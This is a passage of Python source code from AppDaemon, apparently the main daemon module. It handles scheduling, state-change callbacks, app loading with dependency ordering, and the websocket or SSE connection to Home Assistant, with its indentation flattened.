if signum == signal.SIGHUP:
read_apps(True)
if signum == signal.SIGINT:
ha.log(conf.logger, "INFO", "Keyboard interrupt")
conf.stopping = True
if ws is not None:
ws.close()
conf.appq.put_nowait({"event_type": "ha_stop", "data": None})
def dump_sun():
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", "Sun")
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", conf.sun)
ha.log(conf.logger, "INFO", "--------------------------------------------------")
def dump_schedule():
if conf.schedule == {}:
ha.log(conf.logger, "INFO", "Schedule is empty")
else:
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", "Scheduler Table")
ha.log(conf.logger, "INFO", "--------------------------------------------------")
for name in conf.schedule.keys():
ha.log(conf.logger, "INFO", "{}:".format(name))
for entry in sorted(
conf.schedule[name].keys(),
key=lambda uuid_: conf.schedule[name][uuid_]["timestamp"]
):
ha.log(
conf.logger, "INFO",
" Timestamp: {} - data: {}".format(
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(
conf.schedule[name][entry]["timestamp"]
)),
conf.schedule[name][entry]
)
)
ha.log(conf.logger, "INFO", "--------------------------------------------------")
def dump_callbacks():
if conf.callbacks == {}:
ha.log(conf.logger, "INFO", "No callbacks")
else:
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", "Callbacks")
ha.log(conf.logger, "INFO", "--------------------------------------------------")
for name in conf.callbacks.keys():
ha.log(conf.logger, "INFO", "{}:".format(name))
for uuid_ in conf.callbacks[name]:
ha.log(conf.logger, "INFO", " {} = {}".format(uuid_, conf.callbacks[name][uuid_]))
ha.log(conf.logger, "INFO", "--------------------------------------------------")
def dump_objects():
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", "Objects")
ha.log(conf.logger, "INFO", "--------------------------------------------------")
for object_ in conf.objects.keys():
ha.log(conf.logger, "INFO", "{}: {}".format(object_, conf.objects[object_]))
ha.log(conf.logger, "INFO", "--------------------------------------------------")
def dump_queue():
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", "Current Queue Size is {}".format(q.qsize()))
ha.log(conf.logger, "INFO", "--------------------------------------------------")
def check_constraint(key, value):
unconstrained = True
with conf.ha_state_lock:
if key == "constrain_input_boolean":
values = value.split(",")
if len(values) == 2:
entity = values[0]
state = values[1]
else:
entity = value
state = "on"
if entity in conf.ha_state and conf.ha_state[entity]["state"] != state:
unconstrained = False
if key == "constrain_input_select":
values = value.split(",")
entity = values.pop(0)
if entity in conf.ha_state and conf.ha_state[entity]["state"] not in values:
unconstrained = False
if key == "constrain_presence":
if value == "everyone" and not ha.everyone_home():
unconstrained = False
elif value == "anyone" and not ha.anyone_home():
unconstrained = False
elif value == "noone" and not ha.noone_home():
unconstrained = False
if key == "constrain_days":
if today_is_constrained(value):
unconstrained = False
return unconstrained
def check_time_constraint(args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if not ha.now_is_between(start_time, end_time, name):
unconstrained = False
return unconstrained
def dispatch_worker(name, args):
unconstrained = True
#
# Argument Constraints
#
for arg in config[name].keys():
if not check_constraint(arg, config[name][arg]):
unconstrained = False
if not check_time_constraint(config[name], name):
unconstrained = False
#
# Callback level constraints
#
if "kwargs" in args:
for arg in args["kwargs"].keys():
if not check_constraint(arg, args["kwargs"][arg]):
unconstrained = False
if not check_time_constraint(args["kwargs"], name):
unconstrained = False
if unconstrained:
q.put_nowait(args)
def today_is_constrained(days):
day = ha.get_now().weekday()
daylist = [ha.day_of_week(day) for day in days.split(",")]
if day in daylist:
return False
return True
def process_sun(action):
ha.log(
conf.logger, "DEBUG",
"Process sun: {}, next sunrise: {}, next sunset: {}".format(
action, conf.sun["next_rising"], conf.sun["next_setting"]
)
)
with conf.schedule_lock:
for name in conf.schedule.keys():
for entry in sorted(
conf.schedule[name].keys(),
key=lambda uuid_: conf.schedule[name][uuid_]["timestamp"]
):
schedule = conf.schedule[name][entry]
if schedule["type"] == action and "inactive" in schedule:
del schedule["inactive"]
c_offset = ha.get_offset(schedule)
schedule["timestamp"] = ha.calc_sun(action) + c_offset
schedule["offset"] = c_offset
# noinspection PyBroadException
def exec_schedule(name, entry, args):
try:
# Locking performed in calling function
if "inactive" in args:
return
# Call function
if "entity" in args["kwargs"]:
dispatch_worker(name, {
"name": name,
"id": conf.objects[name]["id"],
"type": "attr",
"function": args["callback"],
"attribute": args["kwargs"]["attribute"],
"entity": args["kwargs"]["entity"],
"new_state": args["kwargs"]["new_state"],
"old_state": args["kwargs"]["old_state"],
"kwargs": args["kwargs"],
})
else:
dispatch_worker(name, {
"name": name,
"id": conf.objects[name]["id"],
"type": "timer",
"function": args["callback"],
"kwargs": args["kwargs"],
})
# If it is a repeating entry, rewrite with new timestamp
if args["repeat"]:
if args["type"] == "next_rising" or args["type"] == "next_setting":
# Its sunrise or sunset - if the offset is negative we
# won't know the next rise or set time yet so mark as inactive
# So we can adjust with a scan at sun rise/set
if args["offset"] < 0:
args["inactive"] = 1
else:
# We have a valid time for the next sunrise/set so use it
c_offset = ha.get_offset(args)
args["timestamp"] = ha.calc_sun(args["type"]) + c_offset
args["offset"] = c_offset
else:
# Not sunrise or sunset so just increment
# the timestamp with the repeat interval
args["basetime"] += args["interval"]
args["timestamp"] = args["basetime"] + ha.get_offset(args)
else: # Otherwise just delete
del conf.schedule[name][entry]
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(
conf.error, "WARNING",
"Unexpected error during exec_schedule() for App: {}".format(name)
)
ha.log(conf.error, "WARNING", "Args: {}".format(args))
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# log messages about writing an error (since they show up anyway)
ha.log(conf.logger, "WARNING", "Logged an error to {}".format(conf.errorfile))
ha.log(conf.error, "WARNING", "Scheduler entry has been deleted")
ha.log(conf.error, "WARNING", '-' * 60)
del conf.schedule[name][entry]
@asyncio.coroutine
def do_every(period, f):
t = math.floor(ha.get_now_ts())
count = 0
#t_ = math.floor(time.time())
while not conf.stopping:
count += 1
#delay = max(t_ + count * period - time.time(), 0)
delay = max(t + period - time.time(), 0)
#print(delay)
yield from asyncio.sleep(delay)
t += conf.interval
r = yield from f(t)
#print(t, r)
if r is not None and r != t:
t = math.floor(r)
# noinspection PyBroadException,PyBroadException
def do_every_second(utc):
global was_dst
global last_state
# Lets check if we are connected, if not give up.
if not reading_messages:
return
try:
now = datetime.datetime.fromtimestamp(utc)
conf.now = utc
# If we have reached endtime bail out
if conf.endtime is not None and ha.get_now() >= conf.endtime:
ha.log(conf.logger, "INFO", "End time reached, exiting")
sys.exit(0)
if conf.realtime:
real_now = datetime.datetime.now().timestamp()
delta = abs(utc - real_now)
if delta > 1:
ha.log(conf.logger, "WARNING", "Scheduler clock skew detected - delta = {} - resetting".format(delta))
return real_now
# Update sunrise/sunset etc.
update_sun()
# Check if we have entered or exited DST - if so, reload apps
# to ensure all time callbacks are recalculated
now_dst = is_dst()
if now_dst != was_dst:
ha.log(
conf.logger, "INFO",
"Detected change in DST from {} to {} -"
" reloading all modules".format(was_dst, now_dst)
)
# dump_schedule()
ha.log(conf.logger, "INFO", "-" * 40)
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, read_apps, True)])
#read_apps(True)
# dump_schedule()
was_dst = now_dst
# dump_schedule()
# test code for clock skew
#if random.randint(1, 10) == 5:
# time.sleep(random.randint(1,20))
# Check to see if any apps have changed but only if we have valid state
if last_state is not None:
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, read_apps)])
#read_apps()
# Check to see if config has changed
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, check_config)])
#check_config()
# Call me suspicious, but lets update state form HA periodically
# in case we miss events for whatever reason
# Every 10 minutes seems like a good place to start
if last_state is not None and now - last_state > datetime.timedelta(minutes=10) and conf.ha_url is not None:
try:
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, get_ha_state)])
#get_ha_state()
last_state = now
except:
ha.log(conf.logger, "WARNING", "Unexpected error refreshing HA state - retrying in 10 minutes")
# Check on Queue size
qsize = q.qsize()
if qsize > 0 and qsize % 10 == 0:
conf.logger.warning("Queue size is {}, suspect thread starvation".format(q.qsize()))
# Process callbacks
# ha.log(conf.logger, "DEBUG", "Scheduler invoked at {}".format(now))
with conf.schedule_lock:
for name in conf.schedule.keys():
for entry in sorted(
conf.schedule[name].keys(),
key=lambda uuid_: conf.schedule[name][uuid_]["timestamp"]
):
if conf.schedule[name][entry]["timestamp"] <= utc:
exec_schedule(name, entry, conf.schedule[name][entry])
else:
break
for k, v in list(conf.schedule.items()):
if v == {}:
del conf.schedule[k]
return utc
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", "Unexpected error during do_every_second()")
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# log messages about writing an error (since they show up anyway)
ha.log(
conf.logger, "WARNING",
"Logged an error to {}".format(conf.errorfile)
)
# noinspection PyBroadException
def worker():
while True:
args = q.get()
_type = args["type"]
function = args["function"]
_id = args["id"]
name = args["name"]
if name in conf.objects and conf.objects[name]["id"] == _id:
try:
if _type == "initialize":
ha.log(conf.logger, "DEBUG", "Calling initialize() for {}".format(name))
function()
ha.log(conf.logger, "DEBUG", "{} initialize() done".format(name))
elif _type == "timer":
function(ha.sanitize_timer_kwargs(args["kwargs"]))
elif _type == "attr":
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
function(entity, attr, old_state, new_state,
ha.sanitize_state_kwargs(args["kwargs"]))
elif _type == "event":
data = args["data"]
function(args["event"], data, args["kwargs"])
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", "Unexpected error in worker for App {}:".format(name))
ha.log(conf.error, "WARNING", "Worker Ags: {}".format(args))
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
ha.log(conf.logger, "WARNING", "Logged an error to {}".format(conf.errorfile))
else:
conf.logger.warning("Found stale callback for {} - discarding".format(name))
if inits.get(name):
inits.pop(name)
q.task_done()
def term_file(name):
global config
for key in config:
if "module" in config[key] and config[key]["module"] == name:
term_object(key)
def clear_file(name):
global config
for key in config:
if "module" in config[key] and config[key]["module"] == name:
clear_object(key)
if key in conf.objects:
del conf.objects[key]
def clear_object(object_):
ha.log(conf.logger, "DEBUG", "Clearing callbacks for {}".format(object_))
with conf.callbacks_lock:
if object_ in conf.callbacks:
del conf.callbacks[object_]
with conf.schedule_lock:
if object_ in conf.schedule:
del conf.schedule[object_]
def term_object(name):
if name in conf.callbacks:
if hasattr(conf.objects[name]["object"], "terminate"):
ha.log(conf.logger, "INFO", "Terminating Object {}".format(name))
# Call terminate directly rather than via worker thread
# so we know terminate has completed before we move on
conf.objects[name]["object"].terminate()
def init_object(name, class_name, module_name, args):
ha.log(conf.logger, "INFO", "Loading Object {} using class {} from module {}".format(name, class_name, module_name))
module = __import__(module_name)
app_class = getattr(module, class_name)
conf.objects[name] = {
"object": app_class(
name, conf.logger, conf.error, args, conf.global_vars
),
"id": uuid.uuid4()
}
# Call it's initialize function
conf.objects[name]["object"].initialize()
# with conf.threads_busy_lock:
# inits[name] = 1
# conf.threads_busy += 1
# q.put_nowait({
# "type": "initialize",
# "name": name,
# "id": conf.objects[name]["id"],
# "function": conf.objects[name]["object"].initialize
# })
def check_and_disapatch(name, function, entity, attribute, new_state,
old_state, cold, cnew, kwargs):
if attribute == "all":
dispatch_worker(name, {
"name": name,
"id": conf.objects[name]["id"],
"type": "attr",
"function": function,
"attribute": attribute,
"entity": entity,
"new_state": new_state,
"old_state": old_state,
"kwargs": kwargs
})
else:
if old_state is None:
old = None
else:
if attribute in old_state:
old = old_state[attribute]
elif attribute in old_state['attributes']:
old = old_state['attributes'][attribute]
else:
old = None
if new_state is None:
new = None
else:
if attribute in 'new_state':
new = new_state[attribute]
elif attribute in new_state['attributes']:
new = new_state['attributes'][attribute]
else:
new = None
if (cold is None or cold == old) and (cnew is None or cnew == new):
if "duration" in kwargs:
# Set a timer
exec_time = ha.get_now_ts() + int(kwargs["duration"])
kwargs["handle"] = ha.insert_schedule(
name, exec_time, function, False, None,
entity=entity,
attribute=attribute,
old_state=old,
new_state=new, **kwargs
)
else:
# Do it now
dispatch_worker(name, {
"name": name,
"id": conf.objects[name]["id"],
"type": "attr",
"function": function,
"attribute": attribute,
"entity": entity,
"new_state": new,
"old_state": old,
"kwargs": kwargs
})
else:
if "handle" in kwargs:
# cancel timer
ha.cancel_timer(name, kwargs["handle"])
def process_state_change(data):
entity_id = data['data']['entity_id']
ha.log(conf.logger, "DEBUG", "Entity ID:{}:".format(entity_id))
device, entity = entity_id.split(".")
# Process state callbacks
with conf.callbacks_lock:
for name in conf.callbacks.keys():
for uuid_ in conf.callbacks[name]:
callback = conf.callbacks[name][uuid_]
if callback["type"] == "state":
cdevice = None
centity = None
if callback["entity"] is not None:
if "." not in callback["entity"]:
cdevice = callback["entity"]
centity = None
else:
cdevice, centity = callback["entity"].split(".")
if callback["kwargs"].get("attribute") is None:
cattribute = "state"
else:
cattribute = callback["kwargs"].get("attribute")
cold = callback["kwargs"].get("old")
cnew = callback["kwargs"].get("new")
if cdevice is None:
check_and_disapatch(
name, callback["function"], entity_id,
cattribute,
data['data']['new_state'],
data['data']['old_state'],
cold, cnew,
callback["kwargs"]
)
elif centity is None:
if device == cdevice:
check_and_disapatch(
name, callback["function"], entity_id,
cattribute,
data['data']['new_state'],
data['data']['old_state'],
cold, cnew,
callback["kwargs"]
)
elif device == cdevice and entity == centity:
check_and_disapatch(
name, callback["function"], entity_id,
cattribute,
data['data']['new_state'],
data['data']['old_state'], cold,
cnew,
callback["kwargs"]
)
def process_event(data):
with conf.callbacks_lock:
for name in conf.callbacks.keys():
for uuid_ in conf.callbacks[name]:
callback = conf.callbacks[name][uuid_]
if "event" in callback and (
callback["event"] is None
or data['event_type'] == callback["event"]):
# Check any filters
_run = True
for key in callback["kwargs"]:
if key in data["data"] and callback["kwargs"][key] != \
data["data"][key]:
_run = False
if _run:
dispatch_worker(name, {
"name": name,
"id": conf.objects[name]["id"],
"type": "event",
"event": data['event_type'],
"function": callback["function"],
"data": data["data"],
"kwargs": callback["kwargs"]
})
# noinspection PyBroadException
def process_message(data):
try:
ha.log(
conf.logger, "DEBUG",
"Event type:{}:".format(data['event_type'])
)
ha.log(conf.logger, "DEBUG", data["data"])
if data['event_type'] == "state_changed":
entity_id = data['data']['entity_id']
# First update our global state
with conf.ha_state_lock:
conf.ha_state[entity_id] = data['data']['new_state']
if conf.apps is True:
# Process state changed message
if data['event_type'] == "state_changed":
process_state_change(data)
# Process non-state callbacks
process_event(data)
# Update dashboards
if conf.dashboard is True:
appdash.ws_update(data)
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", "Unexpected error during process_message()")
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
ha.log(conf.logger, "WARNING", "Logged an error to {}".format(conf.errorfile))
# noinspection PyBroadException
def check_config():
global config_file_modified
global config
new_config = None
try:
modified = os.path.getmtime(config_file)
if modified > config_file_modified:
ha.log(conf.logger, "INFO", "{} modified".format(config_file))
config_file_modified = modified
root, ext = os.path.splitext(config_file)
if ext == ".yaml":
with open(config_file, 'r') as yamlfd:
config_file_contents = yamlfd.read()
try:
new_config = yaml.load(config_file_contents)
except yaml.YAMLError as exc:
print(conf.dash, "WARNING", "Error loading configuration")
if hasattr(exc, 'problem_mark'):
if exc.context is not None:
ha.log(conf.dash, "WARNING", "parser says")
ha.log(conf.dash, "WARNING", str(exc.problem_mark))
ha.log(conf.dash, "WARNING", str(exc.problem) + " " + str(exc.context))
else:
ha.log(conf.dash, "WARNING", "parser says")
ha.log(conf.dash, "WARNING", str(exc.problem_mark))
ha.log(conf.dash, "WARNING", str(exc.problem))
else:
new_config = configparser.ConfigParser()
new_config.read_file(open(config_file))
if new_config is None:
ha.log(conf.dash, "WARNING", "New config not applied")
return
# Check for changes
for name in config:
if name == "DEFAULT" or name == "AppDaemon":
continue
if name in new_config:
if config[name] != new_config[name]:
# Something changed, clear and reload
ha.log(conf.logger, "INFO", "App '{}' changed - reloading".format(name))
term_object(name)
clear_object(name)
init_object(
name, new_config[name]["class"],
new_config[name]["module"], new_config[name]
)
else:
# Section has been deleted, clear it out
ha.log(conf.logger, "INFO", "App '{}' deleted - removing".format(name))
clear_object(name)
for name in new_config:
if name == "DEFAULT" or name == "AppDaemon":
continue
if name not in config:
#
# New section added!
#
ha.log(conf.logger, "INFO", "App '{}' added - running".format(name))
init_object(
name, new_config[name]["class"],
new_config[name]["module"], new_config[name]
)
config = new_config
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", "Unexpected error:")
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
ha.log(conf.logger, "WARNING", "Logged an error to {}".format(conf.errorfile))
# noinspection PyBroadException
def read_app(file, reload=False):
global config
name = os.path.basename(file)
module_name = os.path.splitext(name)[0]
# Import the App
try:
if reload:
ha.log(conf.logger, "INFO", "Reloading Module: {}".format(file))
file, ext = os.path.splitext(name)
#
# Clear out callbacks and remove objects
#
term_file(file)
clear_file(file)
#
# Reload
#
try:
importlib.reload(conf.modules[module_name])
except KeyError:
if name not in sys.modules:
# Probably failed to compile on initial load
# so we need to re-import
read_app(file)
else:
# A real KeyError!
raise
else:
ha.log(conf.logger, "INFO", "Loading Module: {}".format(file))
conf.modules[module_name] = importlib.import_module(module_name)
# Instantiate class and Run initialize() function
for name in config:
if name == "DEFAULT" or name == "AppDaemon" or name == "HASS" or name == "HADashboard":
continue
if module_name == config[name]["module"]:
class_name = config[name]["class"]
init_object(name, class_name, module_name, config[name])
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", "Unexpected error during loading of {}:".format(name))
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
ha.log(conf.logger, "WARNING", "Logged an error to {}".format(conf.errorfile))
def get_module_dependencies(file):
global config
module_name = get_module_from_path(file)
for key in config:
if "module" in config[key] and config[key]["module"] == module_name:
if "dependencies" in config[key]:
return config[key]["dependencies"].split(",")
else:
return None
return None
def in_previous_dependencies(dependencies, load_order):
for dependency in dependencies:
dependency_found = False
for batch in load_order:
for module in batch:
module_name = get_module_from_path(module["name"])
# print(dependency, module_name)
if dependency == module_name:
# print("found {}".format(module_name))
dependency_found = True
if not dependency_found:
return False
return True
def dependencies_are_satisfied(module, load_order):
dependencies = get_module_dependencies(module)
if dependencies is None:
return True
if in_previous_dependencies(dependencies, load_order):
return True
return False
def get_module_from_path(path):
name = os.path.basename(path)
module_name = os.path.splitext(name)[0]
return module_name
def find_dependent_modules(module):
global config
module_name = get_module_from_path(module["name"])
dependents = []
for mod in config:
if "dependencies" in config[mod]:
for dep in config[mod]["dependencies"].split(","):
if dep == module_name:
dependents.append(config[mod]["module"])
return dependents
def get_file_from_module(module):
for file in conf.monitored_files:
module_name = get_module_from_path(file)
if module_name == module:
return file
return None
def file_in_modules(file, modules):
for mod in modules:
if mod["name"] == file:
return True
return False
# noinspection PyBroadException
def read_apps(all_=False):
global config
found_files = []
modules = []
for root, subdirs, files in os.walk(conf.app_dir):
if root[-11:] != "__pycache__":
for file in files:
if file[-3:] == ".py":
found_files.append(os.path.join(root, file))
for file in found_files:
if file == os.path.join(conf.app_dir, "__init__.py"):
continue
if file == os.path.join(conf.app_dir, "__pycache__"):
continue
modified = os.path.getmtime(file)
if file in conf.monitored_files:
if conf.monitored_files[file] < modified or all_:
# read_app(file, True)
module = {"name": file, "reload": True, "load": True}
modules.append(module)
conf.monitored_files[file] = modified
else:
# read_app(file)
modules.append({"name": file, "reload": False, "load": True})
conf.monitored_files[file] = modified
# Add any required dependent files to the list
if modules:
more_modules = True
while more_modules:
module_list = modules.copy()
for module in module_list:
dependent_modules = find_dependent_modules(module)
if not dependent_modules:
more_modules = False
else:
for mod in dependent_modules:
file = get_file_from_module(mod)
if file is None:
ha.log(conf.logger, "ERROR", "Unable to resolve dependencies due to incorrect references")
ha.log(conf.logger, "ERROR", "The following modules have unresolved dependencies:")
ha.log(conf.logger, "ERROR", get_module_from_path(module["file"]))
raise ValueError("Unresolved dependencies")
mod_def = {"name": file, "reload": True, "load": True}
if not file_in_modules(file, modules):
# print("Appending {} ({})".format(mod, file))
modules.append(mod_def)
# Loading order algorithm requires full population of modules
# so we will add in any missing modules but mark them for not loading
for file in conf.monitored_files:
if not file_in_modules(file, modules):
modules.append({"name": file, "reload": False, "load": False})
# Figure out loading order
# for mod in modules:
# print(mod["name"], mod["load"])
load_order = []
while modules:
batch = []
module_list = modules.copy()
for module in module_list:
# print(module)
if dependencies_are_satisfied(module["name"], load_order):
batch.append(module)
modules.remove(module)
if not batch:
ha.log(conf.logger, "ERROR", "Unable to resolve dependencies due to incorrect or circular references")
ha.log(conf.logger, "ERROR", "The following modules have unresolved dependencies:")
for module in modules:
module_name = get_module_from_path(module["name"])
ha.log(conf.logger, "ERROR", module_name)
raise ValueError("Unresolved dependencies")
load_order.append(batch)
try:
for batch in load_order:
for module in batch:
if module["load"]:
read_app(module["name"], module["reload"])
except:
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", "Unexpected error loading file")
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", traceback.format_exc())
ha.log(conf.logger, "WARNING", '-' * 60)
def get_ha_state():
ha.log(conf.logger, "DEBUG", "Refreshing HA state")
states = ha.get_ha_state()
with conf.ha_state_lock:
for state in states:
conf.ha_state[state["entity_id"]] = state
# noinspection PyBroadException,PyBroadException
def run():
global was_dst
global last_state
global reading_messages
conf.appq = asyncio.Queue(maxsize=0)
first_time = True
conf.stopping = False
ha.log(conf.logger, "DEBUG", "Entering run()")
conf.loop = asyncio.get_event_loop()
# Save start time
conf.start_time = datetime.datetime.now()
# Take a note of DST
was_dst = is_dst()
# Setup sun
update_sun()
conf.executor = concurrent.futures.ThreadPoolExecutor(max_workers=5)
tasks = []
if conf.apps is True:
ha.log(conf.logger, "DEBUG", "Creating worker threads ...")
# Create Worker Threads
for i in range(conf.threads):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
ha.log(conf.logger, "DEBUG", "Done")
if conf.ha_url is not None:
# Read apps and get HA State before we start the timer thread
ha.log(conf.logger, "DEBUG", "Calling HA for initial state")
while last_state is None:
try:
get_ha_state()
last_state = ha.get_now()
except:
ha.log(
conf.logger, "WARNING",
"Disconnected from Home Assistant, retrying in 5 seconds"
)
if conf.loglevel == "DEBUG":
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", "Unexpected error:")
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", traceback.format_exc())
ha.log(conf.logger, "WARNING", '-' * 60)
time.sleep(5)
ha.log(conf.logger, "INFO", "Got initial state")
# Initialize appdaemon loop
tasks.append(asyncio.async(appdaemon_loop()))
else:
last_state = ha.get_now()
if conf.apps is True:
# Load apps
ha.log(conf.logger, "DEBUG", "Reading Apps")
read_apps(True)
ha.log(conf.logger, "INFO", "App initialization complete")
# Create timer loop
# First, update "now" for less chance of clock skew error
if conf.realtime:
conf.now = datetime.datetime.now().timestamp()
ha.log(conf.logger, "DEBUG", "Starting timer loop")
tasks.append(asyncio.async(do_every(conf.tick, do_every_second)))
tasks.append(asyncio.async(appstate_loop()))
reading_messages = True
else:
ha.log(conf.logger, "INFO", "Apps are disabled")
# Initialize Dashboard
if conf.dashboard is True:
ha.log(conf.logger, "INFO", "Starting dashboard")
#tasks.append(appdash.run_dash(conf.loop))
appdash.run_dash(conf.loop)
else:
ha.log(conf.logger, "INFO", "Dashboards are disabled")
conf.loop.run_until_complete(asyncio.wait(tasks))
while not conf.stopping:
asyncio.sleep(1)
ha.log(conf.logger, "INFO", "AppDeamon Exited")
@asyncio.coroutine
def appstate_loop():
while not conf.stopping:
args = yield from conf.appq.get()
process_message(args)
conf.appq.task_done()
@asyncio.coroutine
def appdaemon_loop():
first_time = True
global reading_messages
global ws
conf.stopping = False
_id = 0
while not conf.stopping:
_id += 1
try:
if first_time is False:
# Get initial state
get_ha_state()
last_state = ha.get_now()
ha.log(conf.logger, "INFO", "Got initial state")
# Let the timer thread know we are in business,
# and give it time to tick at least once
reading_messages = True
# Load apps
read_apps(True)
ha.log(conf.logger, "INFO", "App initialization complete")
#
# Fire HA_STARTED and APPD_STARTED Events
#
if first_time is True:
process_event({"event_type": "appd_started", "data": {}})
first_time = False
elif conf.ha_url is not None:
process_event({"event_type": "ha_started", "data": {}})
if conf.version < parse_version('0.34') or conf.commtype == "SSE":
#
# Older version of HA - connect using SSEClient
#
if conf.commtype == "SSE":
ha.log(conf.logger, "INFO", "Using SSE")
else:
ha.log(
conf.logger, "INFO",
"Home Assistant version < 0.34.0 - "
"falling back to SSE"
)
headers = {'x-ha-access': conf.ha_key}
if conf.timeout is None:
messages = SSEClient(
"{}/api/stream".format(conf.ha_url),
verify=False, headers=headers, retry=3000
)
ha.log(
conf.logger, "INFO",
"Connected to Home Assistant".format(conf.timeout)
)
else:
messages = SSEClient(
"{}/api/stream".format(conf.ha_url),
verify=False, headers=headers, retry=3000,
timeout=int(conf.timeout)
)
ha.log(
conf.logger, "INFO",
"Connected to Home Assistant with timeout = {}".format(
conf.timeout
)
)
while True:
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, messages.__next__)])
msg = list(completed)[0].result()
if msg.data != "ping":
process_message(json.loads(msg.data))
else:
#
# Connect to websocket interface
#
url = conf.ha_url
if url.startswith('https://'):
url = url.replace('https', 'wss', 1)
elif url.startswith('http://'):
url = url.replace('http', 'ws', 1)
sslopt = {}
if conf.certpath:
sslopt['ca_certs'] = conf.certpath
ws = create_connection(
"{}/api/websocket".format(url), sslopt=sslopt
)
result = json.loads(ws.recv())
ha.log(conf.logger, "INFO",
"Connected to Home Assistant {}".format(
result["ha_version"]))
#
# Check if auth required, if so send password
#
if result["type"] == "auth_required":
auth = json.dumps({
"type": "auth",
"api_password": conf.ha_key
})
ws.send(auth)
result = json.loads(ws.recv())
if result["type"] != "auth_ok":
ha.log(conf.logger, "WARNING",
"Error in authentication")
raise ValueError("Error in authentication")
#
# Subscribe to event stream
#
sub = json.dumps({
"id": _id,
"type": "subscribe_events"
})
ws.send(sub)
result = json.loads(ws.recv())
if not (result["id"] == _id and result["type"] == "result" and
result["success"] is True):
ha.log(
conf.logger, "WARNING",
"Unable to subscribe to HA events, id = {}".format(_id)
)
ha.log(conf.logger, "WARNING", result)
raise ValueError("Error subscribing to HA Events")
#
# Loop forever consuming events
#
while not conf.stopping:
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, ws.recv)])
result = json.loads(list(completed)[0].result())
if not (result["id"] == _id and result["type"] == "event"):
ha.log(
conf.logger, "WARNING",
"Unexpected result from Home Assistant, "
"id = {}".format(_id)
)
ha.log(conf.logger, "WARNING", result)
raise ValueError(
"Unexpected result from Home Assistant"
)
process_message(result["event"])
except:
reading_messages = False
if not conf.stopping:
ha.log(
conf.logger, "WARNING",
"Disconnected from Home Assistant, retrying in 5 seconds"
)
if conf.loglevel == "DEBUG":
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", "Unexpected error:")
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", traceback.format_exc())
ha.log(conf.logger, "WARNING", '-' * 60)
time.sleep(5)
ha.log(conf.logger, "INFO", "Disconnecting from Home Assistant")
def find_path(name):
for path in [os.path.join(os.path.expanduser("~"), ".homeassistant"),
os.path.join(os.path.sep, "etc", "appdaemon")]:
_file = os.path.join(path, name)
if os.path.isfile(_file) or os.path.isdir(_file):
return _file
return None
# noinspection PyBroadException
def main():
global config
global config_file
global config_file_modified
# import appdaemon.stacktracer
# appdaemon.stacktracer.trace_start("/tmp/trace.html")
# Windows does not support SIGUSR1 or SIGUSR2
if platform.system() != "Windows":
signal.signal(signal.SIGUSR1, handle_sig)
signal.signal(signal.SIGINT, handle_sig)
signal.signal(signal.SIGHUP, handle_sig)
# Get command line args
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", help="full path to config directory", type=str, default=None)
parser.add_argument("-p", "--pidfile", help="full path to PID File", default="/tmp/hapush.pid")
